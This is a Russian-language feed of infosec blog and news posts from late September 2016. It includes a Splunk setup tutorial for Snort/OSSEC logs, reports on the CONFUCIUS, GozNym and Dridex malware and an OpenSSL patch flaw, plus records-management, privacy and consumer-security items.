Следующие 100 записей

Продолжают серию тезисов докладов на Конгрессе МСА в Сеуле тезисы выступления Хрвое Станчича (Hrvoje Stancic, университет Загреба, Хорватия), Ханс Альмгрен (Hans Almgren, компания Enigio Time AB, Швеция) и Натальи Храмцовской (ООО «Электронные Офисные Системы», Россия), полное название которого звучит следующим образом «Управление документами в электронную эпоху: Возможности и проблемы использования проставления отметок времени с использованием связывания и технологии блокчейн для поддержания долговременной целостности и аутентияности» (Recordkeeping in the digital age - Possibilities and challenges of using linking based timestamping and blockchain technology to maintain long term integrity and authenticity). Выступал на Конгрессе, а также сыграл основную роль в подготовке доклада Хрвое Станчич.

При обеспечении долговременной сохранности (Long term preservation, LTP) электронных документов возникает целый ряд проблем (технологических и процедурных), связанных с их целостностью и аутентичностью. В тех случаях, когда существуют требования о сохранении документов в течение десятилетий, это также означает, что придется раз за разом проводить их миграцию на новые технологии.

На фото: Хрвое Станчич на Конгрессе МСА.

Лючиана Дюранти (Luciana Duranti) и Жан-Франсуа Бланшетт (Jean-François Blanchette) утверждают, что «электронные информационные технологии создают значительные риски того, что электронные документы могут быть изменены, как неумышленно, так и намеренно (...). Поэтому в случае документов, хранящихся в электронных системах, презумпция аутентичности должна быть подкреплена доказательствами того, что документ является именно тем. чем представляется, и что он не был в каком-либо существенном отношении модифицирован или испорчен. Для того, чтобы оценить аутентичность электронного документа, обеспечивающая его сохранность сторона должна быть способна установить его идентичность и доказать его целостность» (см. www.interpares.org/book/interpares_book_k_app02.pdf , для доступа из России может потребоваться анонимайзер - Н.Х.).

В центре внимания авторов находится изучение возможности применения технологии проставления отметок времени с использованием связывания (linking based timestamping) и блокчейн-технологии для решения проблем, связанных с обеспечением долговременной сохранности электронных документов. Данные методы могут быть использованы в качестве инструментов хорошего управления и подотчетности, а также в качестве источника для сохранения коллективной самобытности и памяти. Потенциально они могут стать технологической поддержкой для укрепления архивной связи между документами (archival bond).

Схемы связывания могут обеспечить защищённость, доступность, аутентичность электронных документов и сохранение ими целостности, потенциально в течение длительного времени. Некоторые из принципов, использованных Мерклом (Merkle), а именно хеш-деревья, также использовались Накамото (Satoshi Nakamoto) при создании криптовалюты «Биткойн» (Bitcoin), результатом чего стало развитие и распространение технологии «блокчейн».

Авторы утверждают, что схема связывания, основанная на комбинации дерева Меркла с «широко засвидетельствованными» публикациями (как это описано в международном стандарте ISO/IEC 18014-3:2009 «Сервисы отметок времени – Часть 3: Механизмы, создающие связанные токены» и др.) в публичных СМИ и блокчейнах можно было бы применять в качестве прочной основы для долговременного поддержания в облаке архивной связи документов.

В докладе также описывается решение, запатентованное шведской компанией Enigio Time AB ( https://enigio.com/about-us ). Сосредоточив в первую очередь внимание на реализуемости предлагаемого метода и его возможных применениях, авторы также рассматривают технические, правовые и социальные проблемы, которые придётся решать при внедрении новой технологии.

Мой комментарий: Самое последнее предложение как раз упоминает тот вопрос, которым я больше всего занималась, и поверьте – проблем действительно немало! :)

Источник: Сборник тезисов докладов на Конгрессе МСА в Сеуле
http://www.ica.org/sites/default/files/ICA%202016%20Abstracts%26biographies%20ENG%20v3%20print.pdf

orig: 2016-09-29 09:56:13 / http://rusrim.blogspot.com/2016/09/blog-post_29.html (click post title)

Сегодня мы рассмотрим базовую работу с платформой для операционной аналитики Splunk Enterprise.

Мы настроим Splunk на сбор данных с удаленного сервера, на котором работает NIDS Snort и сервера, использующего HIDS OSSEC. Рассмотрим несколько способов подключения источников и поговорим о других возможностях Splunk.

Официальный сайт дает следующее определение комплексу Splunk Enterprise:

Splunk Enterprise упрощает сбор, анализ и работу с большими наборами данных, которые генерируются вашей технологической инфраструктурой, системами безопасности и бизнес-приложениями.

Все компоненты Splunk можно скачать с официального сайта www.splunk.com
Доступно 3 варианта платформы:

• Splunk Enterprise
• Splunk Light
• Splunk Cloud

Про каждый из них можно почитать на официальном сайте, а здесь мы поговорил только о первом.

Подробнее о различиях версий Free и Enterprise можно почитать тут:
www.splunk.com/en_us/products/splunk-enterprise/free-vs-enterprise.html

Регистрируемся на сайте www.splunk.com
Скачиваем Splunk Enterprise для вашей платформы. Я использовал CentOS 7 (x86_64)

Устанавливаем RPM пакет:

rpm -i splunk-6.4.3-b03109c2bad4-linux-2.6-x86_64.rpm

Сервер устанавливается в /opt/splunk

Запускаем

/opt/splunk/bin/splunk start

Принимаем лицензионное соглашение, нажимаем q, затем y

Открываем веб-интерфейс

http://hostname:8000

Вводим стандартные логин/пароль (admin/changeme)
Меняем пароль на постоянный

В правом верхнем углу могут появиться предупреждения о нехватке места на диске, и по этой причине индексация не будет работать.

Нас это не устраивает и мы уменьшим пороговое значение, при котором индексация должна отключаться.

Определение индекса в Splunk несколько отличается от привычного. Здесь под индексом подразумевается специальным образом сохраненная информация, полученная Splunk сервером от источников, т.е. всевозможные сообщения, поиск по которым мы в дальнейшем осуществляем.
Подробнее можно почитать здесь
docs.splunk.com/Documentation/Splunk/6.0/Indexer/HowSplunkstoresindexes

Все индексы хранятся здесь

/opt/splunk/var/lib/splunk/defaultdb

т.е. для нас такое предупреждение означает, что Splunk не будет принимать сообщения от источников.

Если у вас не появилось такого предупреждения, то ничего предпринимать не нужно.
Если появилось, то в меню выбираем Settings -> Server settings -> General settings

и устанавливаем параметр «Pause indexing if free disk space (in MB) falls below» на меньшее значение, я поставил 1000

Сохраняем

Нужно перезапустить сервер, это можно сделать из веб-интерфейса.
Меню -> Settings -> Server control -> Restart Splunk

После перезапуска предупреждение пропадет и индексация заработает.

Для передачи данных с удаленных серверов, Splunk использует агенты, которые так же можно скачать с официального сайта бесплатно и эта возможность сохраняется при использовании бесплатной лицензии.
Чтобы агенты имели возможность подключаться к серверу, нужно включить на сервере листнер.

Я добавил /opt/splunk/bin в переменную окружения PATH, чтобы вызывать команды управления проще.
Включаем листнер командой ОС

splunk enable listen 9999

вводим логин и пароль сервера и получаем сообщение

Listening for Splunk data on TCP port 9999.

и давайте сразу настроим наш сервер на автозапуск:

splunk enable boot-start

получаем

Init script installed at /etc/init.d/splunk.
Init script is configured to run at boot.

Проверяем какие порты слушает Splunk

netstat -tln

должны слушаться 8000, 8089 и 9999

Почему передавать логи с удаленного сервера через агента Splunk — это правильно?

Агент доступен для ОС Windows, Linux, Solaris, Mac OS, FreeBSD, AIX, HP-UX.

Скачиваем агент для своей платформы. В моем случае это снова CentOS 7 (x86_64)

www.splunk.com/en_us/download/universal-forwarder.html

Устанавливаем агент

rpm -i splunkforwarder-6.5.0-59c8927def0f-linux-2.6-x86_64.rpm

Готово!

агент устанавливается в /opt/splunkforwarder

Запускаем

/opt/splunkforwarder/bin/splunk start

принимаем лицензионное соглашение, нажимаем q, затем y

Если в конце лога мы видим
Starting splunk server daemon (splunkd)...
Done

значит все хорошо.

Авторизуемся агентом на сервере

/opt/splunkforwarder/bin/splunk add forward-server 192.168.1.1:9999

Вводим пароль для доступа к конфигурации splunkforwarder, по умолчанию это
логин admin
и
пароль changeme

Мы должны получить сообщение
Added forwarding to: 192.168.1.1:9999

Еще одной командой указываем агенту получать конфигурацию централизованно, от сервера.
Это позволит указывать файлы для мониторинга не через конфигурационные файлы агентов, а через веб-интерфейс сервера.

/opt/splunkforwarder/bin/splunk set deploy-poll 192.168.1.1:8089

Должны увидеть
Configuration updated.

проверяем, что наш сервер корректно прописался в конфигурационном файле
cat /opt/splunkforwarder/etc/system/local/deploymentclient.conf

targetUri = 192.168.1.1:8089

проверяем лог агента
tail -f /opt/splunkforwarder/var/log/splunk/splunkd.log

ждем сообщения вида

09-28-2016 03:25:18.798 -0400 INFO HttpPubSubConnection - Running phone uri=/services/broker/phonehome/connection_192.168.1.2_8089_192.168.1.2_snortserver_B495EC7F-3839-4175-99BB-F599AD6D95B9

Если видим ошибки от Deploymen Client (DC), что нельзя использовать localhost как hostname, то задаем другое имя хоста, прописываем его в /etc/hosts и выполняем команду регистрации на порт 8089 еще раз, затем проверяем лог.

Если возникли какие-то трудности, вы всегда можете обратиться к официальной инструкции по адресу
docs.splunk.com/Documentation/Forwarder/6.4.3/Forwarder/HowtoforwarddatatoSplunkEnterprise

После этого смотрим через веб-интерфейс сервера, «дозвонился» ли агент.

Меню Settings -> Forwarder management

Если агент появился, мы можем теперь указать ему, какие файлы требуется мониторить на удаленном сервере.

Для этого выбираем пункт меню Settings -> Data Inputs
Экран разделен на две секции, Local и Forwarded inputs

нам нужен пункт Files & Directories раздела Forwarded inputs

Нажимаем New
Выбираем доступный хост, чтобы он появился в поле Selected host
Указываем произвольный Server class name
Жмем Next

Теперь нужно указать путь до файла(ов), нас интересующих.

Для наших целей мы будем мониторить файлы на удаленном сервере, которые находятся здесь /var/log/snort
и называются по маске alerts.log*

Указываем Source snort, индекс оставляем стандартный.

Жмем Prewiew и подтверждаем наши настройки.
Можем сразу нажать кнопку Start search чтобы протестировать конфигурацию

Триггерим алерт Snort, смотрим в Splunk.

Работает!

Особенностью интерфейса splunk является то, что в нем имеется режим Real-time, в котором нам нет необходимости нажимать Search чтобы обновить страницу.
Она обновляется автоматически при поступлении новых алертов.

Выберем режим Real-time, 1 minute window

Значки стали активны, значит мониторинг в реальном времени включен

Попробуем brute force SSH

Таким образом мониторинг журналов SNORT с удаленного сервера настроен.

На сервере Splunk у меня установлена серверная часть HIDS OSSEC, принимающая от своего агента на удаленном веб-сервере алерты.
Значит мы можем легко добавить в Splunk мониторинг файла OSSEC менеджера, т.к. файл находится на том же сервере, что и серверная часть Splunk.

Для этого мы могли бы использовать практически ту же методику, что и ранее, только в разделе Data inputs
нужно было бы выбрать пункт Files&Directories раздела Local inputs.

Но я хочу продемонстрировать еще одну возможность Splunk — получение данных на TCP или UDP порт.

Я сконфигурирую OSSEC менеджер отправлять данные на 127.0.0.1:514

а Splunk мы настроим следующим образом Меню -> Settings -> Data inputs

Выбираем в разделе Local inputs, UDP

жмем New указываем порт 514

На следующей странице выставляем такие настройки:

Смотрим Review, подтверждаем и начинаем поиск.

Я попробовал залогиниться на веб-сервер несуществующим пользователем. OSSEC агент передал серверу предупреждение, а сервер отправил его в Splunk. Что мы и видим на экране.

Поиск очень продвинутый, от простого поиска по фразе, до фильтрации по всевозможным параметрам.
Все функции описаны в официальной документации. Рекомендую ее к прочтению, если вы хотите использовать Splunk всерьез.

В заключении стоит сказать несколько слов о расширении стандартного функционала Splunk Enterprise приложениями, который легко можно установить прямо через веб-интерфейс или писать самим.

Кликнем на серый прямоугольник боковой панели

И можем найти, например, приложение, добавляющее специально созданный source type для OSSEC.

Жмем Install, вводим логин и пароль от аккаунта Splunk, дожидаемся окончания установки, соглашаемся перезапустить Splunk.

Для более наглядной демонстрации я установлю еще одно приложение для OSSEC — Reporting and Management for OSSEC. Оно работает только вместе с source type, который установился с предыдущим приложением.
Это приложение официально несовместимо с моей версией Splunk, поэтому мне пришлось скачать его с официального сайта вручную и установить через файл, что очень просто делается.
Конечно, не забываем прочитать документацию к устанавливаемому приложению, т.к. не все работает «из коробки», требуются определенные настройки в splunk и ossec.

После установки приложение появляется на панели слева.

Откроем его.

Выберем пункт Agent status

Получаем такое красивое представление.

Или очень удобная функия Event Search и, конечно же, сам dashboard выглядит хорошо.

Аналогичное приложение есть и для SNORT.
Обратите внимание, что приложения иногда требуется устанавливать и на splunkforwarder.

Пример из приложения «Splunk for Snort»

Все эти графики можно выгружать в pfg, печатать и т.п.

В данной статье были рассмотрены лишь основные возможности Splunk. Мы так же можем настроить Splunk  на анализ поступающих сообщений и  задать действия на то или иное событие. Ограничение в 500 мб трафика в день у бесплатной версии вряд ли можно считать критичным для небольшой ИТ среды, так что Splunk Enterprise вполне можно использовать как альтернативу существующим веб-интерфейсам для анализа журналов IDS и не только.

orig: 2016-09-29 09:43:27 / https://defcon.ru/network-security/3585/ (click post title)

ИБ-исследователи опубликовали подробности работы 2-х образцов вредоноса CONFUCIUS.

ИБ исследователи из Palo Alto Network обнаружили интересный образец вредоносного ПО, используемого в двух различных шпионских кампаниях. В исследовании говорится о бэкдоре CONFUCIUS_A, детектируемом с начала 2014 года.

Особенностью находки является способ генерации IP-адреса C&C-сервера, к которому подключаются боты. Обычно дешевое вредоносное ПО использует жестко прописанные в коде IP-адреса, более дорогой софт генерирует IP-адреса C&C-серверов с помощью сложных алгоритмов генерации доменных имен.

Однако CONFUCIUS_A не генерировал трафик на известные вредоносные IP и не использовал сложные алгоритмы генерации доменных имен. Анализ передаваемых с зараженных систем данных не показывал никакой аномалии. Исследователи могли наблюдать лишь обычный HTTP-трафик к популярным сайтам.

Внимательное исследование деятельности вредоноса показало, злоумышленники использовали Q&A секции на сайтах Yahoo и Quora для передачи инструкций ботам. Первый вариант вредоноса искал 2 маркера на Q&A-страницах на сайтах Yahoo и Quora. Между двумя маркерами присутствовало 4 или более слова. Вредонос сканировал содержимое страницы, выбирал все слова между двумя маркерами и конвертировал их в IP-адрес, используя таблицу соответствий слов цифрам.

На скриншоте ниже показан текст, анализируемый вредоносом.

Маркеры в тексте: "suggested options are" и "hope it will help". Текст между маркерами: "fill plate clever road" конвертируется вредоносном в IP-адрес 91.210.107.104.

Второй образец - CONFUCIUS_B, действовал по такому же принципу, однако использовал немного другой алгоритм преобразования слов в цифры.

CONFUCIUS_A – вредонос, используемый в атаках на ресурсы госорганов Пакистана в 2013 году. CONFUCIUS_B – более новый образец вредоносного ПО, используемый в целевых атаках хакерской группировки Patchwork.

ИБ-компании, исследовавшие оба инцидента, полагают, что злоумышленники действуют с территории Индии.

orig: 2016-09-29 09:40:29 / http://www.securitylab.ru/news/483970.php (click post title)

Специалисты смогли взломать алгоритм DGA, используемый трояном для связи с C&C-серверами.

Специалисты Cisco Talos остановили работу одного из ботнетов, организованных гибридным банковским трояном GozNym, сочетающим функционал двух известных вредоносов Gozi и Nymaim. В настоящее время команда принимает меры по пресечению деятельности остальных ботнетов GozNym.

Экспертам удалось остановить работу ботнета, взломав алгоритм генерации доменных имен (DGA), используемый трояном для связи с постоянно меняющимися C&C-серверами злоумышленников. По данным Cisco Talos, ботнет включает по меньшей мере 23 062 инфицированных хостов, большинство из которых расположены в Германии, США, Польше, Канаде и Великобритании.

Исследователи зафиксировали несколько целевых фишинговых кампаний по распространению вредоносного ПО GozNym. В ходе атак злоумышленники рассылали вредоносные документы Microsoft Word, содержащие загрузчик, который загружал и выполнял вредоносный код.

В апреле нынешнего года троян GozNym был замечен в ряде кампаний, направленных на пользователей в США и Канаде, а затем распространившихся на Европу. Спустя несколько месяцев специалисты buguroo Threat Intelligence Labs зафиксировали новый виток атак с использованием GozNym, нацеленных на банки и финансовые сервисы в Испании, Польше, Японии и в ряде случаев – на пользователей из Канады, Италии и Австралии.

orig: 2016-09-29 09:05:58 / http://www.securitylab.ru/news/483969.php (click post title)

https://www.pcweek.ru/security/blog/security/8965.php

Разговаривая с собеседником с помощью iMessage, вы думаете, что никто не может прочесть ваш разговор? Увы, это не так. Непрерывное шифрование не означает что сообщения iMessage безопасны, так как Apple не только хранит информацию о вашем iMessage, в частности о контактах и местоположении, но может поделиться этой информацией с правоохранительными органами.
Согласно новому документу, полученному The Intercept, Apple осуществляет запись лога, с какими телефонными номерами вы обменивались сообшениями, а также ваш IP-адрес, с помощью которого можно отследить ваше местоположение.
Фактически, набирая телефонный номер пользователя для разговора, iMessage связывается с серверами Apple, чтобы уточнить, направить ли данное сообщение по iMessage. Apple делает запись каждого запроса чтобы видеть, кто находится в iMessage, а кто нет.
При этом необходимо помнить, что для iMessage не нужен номер телефона вообще (хотя он может быть) – этот протокол работает и на iPad без SIM-карты, и на Mac –привязка абонента идёт к email-адресу. Собственно, и на iPhone можно настроить так, чтобы не высвечивать номер телефона, а завязаться исключительно на email.
Рекомендация Настройте ваш iMessage исключительно на email и посоветуйте сделать то же вашим собеседникам.

Apple регистрирует Ваш IP-адрес (местоположение)
The Intercept получило документ под названием «iMessage FAQ for Law Enforcement», в котором Apple заявляет что на самом деле данные о iMessage часть намного большего массива данных, передаваемого в правоохранительные органы.
Несмотря на то что ваши сообщения iMessage зашифрованы от начала до конца, это не означает что все данные пользователей конфиденциальны.
Если вы используете резервное копирование iCloud на ваших устройствах Apple, сохраняя копии всех своих сообщений, фотографий и важных данных, хранящихся на ваших устройствах, при этом используя шифрование, то учтите, что ключами шифрования управляет компания Apple, а не вы.
Таким образом, компания Apple может не только читать ваши зашифрованные сообщения iMessage, но и фактически получить полный доступ к вашим данным, хранящимся в резервной копии. Таким образом, даже если вы доверяете компании Apple, то любой, кто сумеет получить доступ к вашей учетной записи iCloud, фактически получит полную информацию о всем, что вы храните на вашем устройстве.
Но ведь можно хранить ваши резервные копии локально, используя iTunes, хотя такой выбор для обычного пользователя не очевиден.
Плохой новостью является то, что в случае использования iOS 10, локальный перебор паролей (атака brute force) может быть осуществлена в 2 500 раз быстрее, чем в случае iOS9. Apple подтвердил существование этой проблемы и пообещал ее исправить.

Нравится Загрузка...

ESET представляет новую версию продукта ESET Security для Microsoft SharePoint Server. Новый продукт специально разработан для антивирусной защиты серверов совместной работы SharePoint. Он использует оптимизированные механизмы сканирования, характерные для структуры базы данных этих серверов.

Продукт поддерживает функцию параллельного сканирования контента в базе данных SharePoint. Сканирование в виде параллельных процессов снижает общее время проверки по требованию.

ESET Security для Microsoft SharePoint Server обеспечивает полную защиту как для документов, так и для сервера. Расширенные настройки фильтрации позволяют определить действия для каждого подозрительного документа. Функция «Контроль устройств» для защиты сервера предусматривает автоматическое сканирование подключаемых внешних устройств и настройку правил работы со съемными носителями для каждого пользователя.

Продукт защищает от вредоносных программ и интернет-угроз благодаря модулям «Расширенное сканирование памяти», «Защита от эксплойтов», «Антифишинг». Интегрирована облачная технология детектирования вредоносного ПО ESET LiveGrid.

При установке ESET Security для Microsoft SharePoint Server можно выбрать только нужные компоненты, чтобы уменьшить нагрузку на систему. Есть возможность указать альтернативные пути для хранения файлов обновления при начальной установке. Это позволяет восстановить актуальную версию продукта при откате системы без повторного скачивания большого объема данных.

Управление продуктом при помощи Windows Management Instrumentation позволяет интегрировать продукт в другие решения для мониторинга сети и продукты класса SIEM.

Пользователь может задавать исключения для отдельных процессов, что повышает совместимость с программным обеспечением сторонних производителей.

Новый продукт оптимизирован для виртуальной среды. Функция ESET Shared Local Cache позволяет значительно ускорить сканирование виртуальных машин за счет хранения информации о ранее просканированных общих файлах. Предусмотрена поддержка кластерной структуры – соединение нескольких продуктов, установленных в кластере, в одно решение для централизованного управления.

Продукт имеет новый графический интерфейс. Централизованное управление обеспечивает веб-консоль ESET Remote Administrator. 

orig: 2016-09-29 08:53:13 / https://www.anti-malware.ru/news/2016-09-29/21084 (click post title)

http://www.pcweek.ru/themes/detail.php?ID=188846

В тот вечер Потапыч еле ноги домой доволок. Уж очень сложный день выдался. Сел у окошка, заварил себе крепкий чай. Решил с липовым медом выпить пару чашек да успокоиться. Но только он себе чашку налил, как заорал телефон.

— Тьфу черт, кого нелегкая несет! И нужен мне был этот телефон дома? Теперь ни посидеть ни чаю выпить! Ну кому я понадобился???

— Потапыч, зайди ко мне, — попросила Хрюша.

— Опять???

— Ну пожалуйста! Что-то у меня компьютер совсем медленно работает! А все после того, как ты мне антивирус установил. Удалить его нужно! Совсем работать не дает!

— Ладно, загляну завтра. А ты уверена, что это антивирус?

— Ну да! Как поставил, так все и началось. Еле-еле ворочается! Он, он виноват, зараза!

— Ну ты не горячись, Хрюша, может и не он. Приду, гляну. Но завтра!

— Да он это, он! Ну не я же!

На следующий день Потапыч пришел к Хрюше.

— Ну давай хозяйка, покажи свой компьютер да ставь чаю с ватрушками! И с медом! Я с работы пришел, устал!

— Это я мигом! Сейчас заварю. И мед у меня, как ты любишь, липовый! Для тебя старалась!

Потапыч, включив компьютер, понял сразу что тут что-то не то. И грузится долго и работает еле-еле.

Взглянув на жесткий диск, он просто за голову схватился. Более 500 000 файлов в корневом каталоге.

— Да что ж ты с ним делала?

— А я как увидела, что он тормозить начал, отключила антивирус полностью. И работала еще две недели!

Потапычу пришлось полезть за флэшкой с диском спасения. Четыре часа шло «лечение». Много новых слов услышала Хрюша.

А потом пришлось и диск чистить и дефрагментацию проводить.

Однако, как оказалось, это не конец истории.

— Да, Хрюша, теперь тебе еще бы обновить то, что у тебя есть.

— А как?

— Да у тебя ж все это антивирус умеет делать?

— ???

— Все просто, видишь, тут написано «Обновление программ». Он проверит что у тебя установлено и предложит обновить, а уж ты сама решай, будешь обновлять или нет. Но лучше согласиться и обновить. Да, кроме того, тут же есть мастер удаления неиспользуемых данных, то есть просто метла, которая поможет тебе весь мусор убрать.

И еще. Тут же есть «Удаление программ». Сможешь убрать все, что давно не запускала и когда-то случайно установила.

А если и это не поможет, включи чтоб антивирус проверял только когда у тебя компьютер ничем не занят. Сама увидишь, насколько быстрее станет. Да не выключай впредь антивирус, а не то одним чаем не отделаешься!

А вы все еще считаете, что ваши ресурсы безжалостно жрет антивирус? Вы уверены?

Нравится Загрузка...

http://www.pcweek.ru/themes/detail.php?ID=188844

Наступила поздняя весна, когда уже казалось, что завтра лето. Многие в этот период ехали в отпуск сами или отправляли в отпуск свои семьи. Все же сидеть летом в душной, даже скорее очень душной и загазованной столице было тяжело, особенно детям. Ну если не в отпуск, то хотя бы за город, на дачу.

Не стал исключением и этот год. Уже в последний месяц весны установилась типично летняя погода. Да еще и дождика не было давно. Грозовые тучи периодически набегали, но увы, дождя так и не было. Казалось весь город уже ждет дождь. Даже асфальт начал плавиться под подошвами людей.

Майк очень хотел в отпуск, но вначале он отправлял к морю жену и маленького ребенка. Он понимал, что лучшим транспортом будет самолет и потому решил заранее побеспокоиться о билетах.

Майк всегда покупал билеты через Интернет, впрочем, как и большинство его знакомых, причем искал самые дешевые маршруты. В этот раз он в поиске задал «Авиабилеты в N», решив, что найдется малоизвестный агрегатор, позволяющий сэкономить еще больше. Поисковик выдал несколько вариантов из которых он выбрал самый первый. Он не думал, что обычный поиск авиабилета приведет его в конце концов в полицию…

— Иоганн, у нас интересное дело!

— А когда дела у нас были не интересными? Вы помните такое? Я — нет!

— В этот раз злоумышленники обнаглели окончательно. К нам обратился некий Майк Стаут. При попытке купить авиабилеты с его счета была переведена сумма, однако авиакомпания заявила, что знать не знает ни о каком Майке. И действительно, денег на ее счет не поступало, мы проверили.

— Очередной фишинговый сайт?

— Да. Причем интересна сама схема. Такого мы еще не видели.

Пройдя по ссылке, пользователь попал на сайт aviapromo.eu (сейчас сайт не работает), на котором во вполне стандартную форму ввел данные об искомом перелете, и сайт выдал ему подходящие рейсы. Пользователь выбрал наиболее удачный из них, перешел на страницу оплаты, ввел данные банковской карты, получил, как и положено, SMS с одноразовым кодом, ввел его и оплатил билеты.

На почту пришли маршрут-квитанции — все как при работе с обычным сайтом по продаже билетов. На первый, да и на второй взгляд ничто не выдает в сайте фишинговую страницу.

Но на следующий день начались чудеса. Сначала на телефон пользователя пришло SMS о списании небольшой суммы, потом эта сумма немедленно вернулась обратно. То же самое повторилось через час. А потом с карты списали уже сумму более крупную, а затем попытались списать еще, но деньги на карте к тому моменту уже кончились.

Пользователь заблокировал карту, но даже после этого кто-то пытался списывать с нее средства. А билеты, как выяснилось, он в результате так и не купил — маршрут-квитанции оказались подделкой.

— Понятно. Сайт заблокировали?

— Безусловно. Сразу же. Да вот только зарегистрирован он в чужой стране на подставное лицо. Деньги ушли туда же на счет малоизвестной компании. Расследование ничего не дало…

— Нужно срочно обнародовать на ТВ наши рекомендации по покупке авиабилетов через Интернет.

— Уже готово.

— И что там?

— Мы посоветовали:

1. Покупайте билеты только непосредственно у авиакомпаний или у известных крупных агрегаторов.

2. При получении SMS с одноразовым кодом подтверждения обращайте внимание не только на сам код, но и на остальной текст сообщения.

3. При первых же признаках подозрительной активности обращайтесь в банк, чтобы заблокировать карту. В описанной ситуации это стоило сделать сразу же после получения SMS о списании первой небольшой суммы и возвращения ее на карту. Да, перевыпускать карту — лишняя морока, но так вы наверняка защитите свои деньги.

А вы всегда следуете таким рекомендациям? Помните: «Не гнался бы ты поп за дешевизной!»

Нравится Загрузка...

Независимый исследователь, автор блога MalwareTech, заметил, что операторы известного банкера Dridex изменили почерк. Так, в последнее время спам, распространяющий троянца, все чаще исходит с легитимных сайтов, которые были скомпрометированы злоумышленниками.

Раньше операторы банкера использовали для распространения трояна ботнет Necurs, однако, судя по всему, сейчас операторы малвари испытывают новую тактику. Исследователь пишет, что из-за изменения паттерна вредоносный спам снова обходит фильтры.

Еще одно изменение, тоже призванное обмануть фильтры, это использование защищенных паролем документов.

«Вредоносные RTF-файлы (документы Word) защищены паролем, который приводится прямо в письме. Это не дает автоматическим системам извлечь и просканировать содержимое вложения на предмет вредоносного кода, так как большинство из них неспособны обнаружить пароль и расшифровать документ», — пишет исследователь.

Но если автоматика не может заглянуть внутрь такого файла, это без труда может сделать пользователь: достаточно открыть файл с помощью приведенного в письме пароля. Как только жертва запустит такой RTF-файл, ее попросят разрешить работу макросов (для этого, как обычно, используется социальная инженерия). Если пользователь попался на удочку атакующих и включил макросы, вредоносный скрипт скачивает с управляющего сервера лоадер Dridex, который тоже отличается от предыдущих версий. Исследователь пишет, что перед началом работы лоадер запускает интерфейс командной строки и 250 раз пингует один из DNS-серверов Google. Судя по всему, таким образом авторы трояна реализовали отложенный старт работы малвари, потому что после Dridex запускается, независимо от результатов пингов, сообщает xakep.ru.

В заключении автор MalwareTech пишет, что в целом эта кампания не сильно отличается от обычных компаний Dridex, но, тем не менее, похоже, что в данном случае операторы трояна нацелились на более защищенные цели. Похоже, что эта версия Dridex ориентирована на заражение корпоративных систем, которые защищены не в пример лучше обычных пользователей.

orig: 2016-09-29 06:49:45 / https://www.anti-malware.ru/news/2016-09-29/21081 (click post title)

22 сентября 2016 года разработчики OpenSSL Project представили ранее анонсированныйпакет исправлений для ряда уязвимостей. К сожалению, разработчики допустили досадный промах, и патч для уязвимости CVE-2016-6307 породил новую проблему, которая получила идентификатор CVE-2016-6309.

Теперь всем пользователям OpenSSL 1.1.0 рекомендуют как можно быстрее обновиться до версии 1.1.0b.

Кроме того, в новой OpenSSL 1.0.2i тоже обнаружили проблему, хотя и менее опасную (CVE-2016-7052). Попытки использования CRL (certificate revocation list) приводят к крашу в силу null pointer exception. Для устранения проблемы уже была представлена версия 1.0.2j, пишет xakep.ru.

Новый бюллетень безопасности, экстренно выпущенный OpenSSL, гласит: «Патч, адресованный уязвимости CVE-2016-6307, вызвал проблему, из-за которой получение сообщения размером более 16 Кб приводит к тому, что буфер, содержащий это сообщение, перераспределяется и перемещается. К сожалению, указатель на старое положение буфера сохраняется, и в результате это приводит к попыткам записи в уже освобожденную ранее область памяти. Вероятнее всего данная проблема спровоцирует аварийное завершение работы, однако в теории она также может привести и к удаленному исполнению произвольного кода».

orig: 2016-09-29 06:41:18 / https://www.anti-malware.ru/news/2016-09-29/21080 (click post title)

В преддверии Всемирного дня пожилого человека, который традиционно отмечается 1 октября, «Лаборатория Касперского» проанализировала поведение возрастных интернет-пользователей, число которых с каждым годом интенсивно растет.

Исследование показало, что большинство россиян старше 55 лет охотно устанавливает защитные решения на компьютеры и мобильные устройства, однако они не склонны корректировать свое поведение и привычки при выходе в Интернет. Кроме того, старшее поколение становится легкой целью для киберпреступников – так, с разного рода киберугрозами за последние 12 месяцев столкнулись 59% опрошенных в этой возрастной категории.

Старшее поколение сегодня активно пользуется Интернетом. К примеру, 92% пользователей старше 55 лет общаются с родственниками и знакомыми по электронной почте, а 82% регулярно заходят в социальные сети. 85% возрастных респондентов ответили, что совершают в Сети финансовые транзакции и делают онлайн-покупки. Примечательно, что по всем этим показателям пожилые люди практически не отстают от молодых. 

Однако когда речь заходит об осознанном и бдительном поведении в Сети, возрастные пользователи демонстрируют большую беспечность, нежели молодежь. Так, люди старше 55 лет редко активируют функции безопасности, изначально встроенные в их устройства (это делает лишь каждый пятый), и еще реже используют VPN при подключении к публичным Wi-Fi-сетям (этой мерой защиты пользуется всего 6%). Для сравнения: аналогичные показатели среди всех возрастных категорий составляют 32% и 13% соответственно. Однако гораздо большую тревогу у экспертов вызывает другой факт: 20% пользователей старшего поколения спокойно делятся личными данными финансового характера на публичных интернет-площадках. К примеру, среди самой, казалось бы, беспечной аудитории от 16 до 24 лет, этот показатель составляет всего 3%.

Непонимание старшим поколением в полной мере рисков информационной безопасности приводит к тому, что его представители нередко становятся жертвами киберугроз. В ходе опроса российские пользователи отметили, что их возрастные родственники сталкивались с вредоносным ПО (33%), страдали от онлайн-мошенничества (17%), видели нежелательный контент (10%), общались с опасными незнакомцами (7%) и даже теряли деньги (6%). 

«Прекрасно, что люди старшего поколения активно используют Интернет: совершают покупки, управляют своими счетами, поддерживают связь с близкими. Однако мы видим, что они недостаточно внимания уделяют защите своих данных от киберугроз. Более того, существенная доля пользователей старше 55 лет даже и не задумывается о том, что может стать жертвой злоумышленников. Поэтому мы призываем возрастных пользователей и их более молодых родственников предпринять меры для повышения уровня своей безопасности и, помимо установки надежного защитного ПО, скорректировать свое онлайн-поведение – а именно проявлять большую бдительность и осмотрительность и не пренебрегать защитными средствами», – советует Андрей Мохоля, руководитель потребительского бизнеса «Лаборатории Касперского».

orig: 2016-09-29 06:35:46 / https://www.anti-malware.ru/news/2016-09-29/21079 (click post title)

Компания МобилитиЛаб представила новую редакцию корпоративного рабочего места WorksPad 3.0, качественно расширяющую возможности мобильной работы благодаря интегрированному в нее браузеру для контролируемого доступа к публичным и корпоративным ресурсам (интернет/интранет).

Ключевая концепция WorksPad – «все-в-одном» – получает естественное развитие в новой версии продукта, обеспечивая развитую поддержку многозадачной работы руководителей и сотрудников компаний и организаций в любом месте в любое время. WorksPad отвечает на два вызова корпоративной мобильности: продуктивность работы корпоративных пользователей и безопасность доступа к корпоративной информации.

